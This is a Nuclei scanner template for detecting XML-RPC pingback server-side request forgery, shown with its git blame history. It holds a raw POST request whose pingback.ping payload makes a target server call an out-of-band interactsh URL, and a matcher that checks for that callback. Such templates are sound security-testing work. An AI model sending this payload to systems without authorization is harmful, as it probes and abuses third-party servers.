nuclei-templates/http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml

id: xmlrpc-pingback-ssrf

info:
  name: XMLRPC Pingback SSRF
  author: geeknik
  severity: high
  description: XMLRPC Pingback leads to SSRF.
  reference:
    - https://hackerone.com/reports/406387
  metadata:
    max-request: 1
  tags: xmlrpc,hackerone,ssrf,generic

http:
  - raw:
      - |
        POST /xmlrpc/pingback HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
        <methodName>pingback.ping</methodName>
        <params>
        <param>
        <value>http://{{interactsh-url}}</value>
        </param>
        </params>
        </methodCall>

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 490a0046304402202fd552633b3c6f4c5532aba3b3d0025c267cf4c5704c8d692e441b7f7c5826a40220211a9632d337da7f877cf9cf0351b171370ded55566578ce211d9daee09ac6ed:922c64590222798bb761d5b6d8e72950
Create xmlrpc-pingback-ssrf.yaml 2021-08-18 11:09:22 +00:00			`id: xmlrpc-pingback-ssrf`

			`info:`
			`name: XMLRPC Pingback SSRF`
			`author: geeknik`
			`severity: high`
Updated descriptions of templates 2024-01-02 15:45:12 +00:00			`description: XMLRPC Pingback leads to SSRF.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://hackerone.com/reports/406387`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: xmlrpc,hackerone,ssrf,generic`
Create xmlrpc-pingback-ssrf.yaml 2021-08-18 11:09:22 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create xmlrpc-pingback-ssrf.yaml 2021-08-18 11:09:22 +00:00			`- raw:`
			`- \|`
			`POST /xmlrpc/pingback HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`

			`<?xml version="1.0" encoding="UTF-8"?>`
			`<methodCall>`
			`<methodName>pingback.ping</methodName>`
			`<params>`
			`<param>`
			`<value>http://{{interactsh-url}}</value>`
			`</param>`
			`</params>`
			`</methodCall>`

			`matchers:`
			`- type: word`
fixing xmlrpc-pingback-ssrf.yaml 2021-09-21 09:51:35 +00:00			`part: interactsh_protocol`
Create xmlrpc-pingback-ssrf.yaml 2021-08-18 11:09:22 +00:00			`words:`
			`- "http"`
Auto Template Signing [Mon Jan 15 11:49:24 UTC 2024] :robot: 2024-01-15 11:49:24 +00:00			`# digest: 490a0046304402202fd552633b3c6f4c5532aba3b3d0025c267cf4c5704c8d692e441b7f7c5826a40220211a9632d337da7f877cf9cf0351b171370ded55566578ce211d9daee09ac6ed:922c64590222798bb761d5b6d8e72950`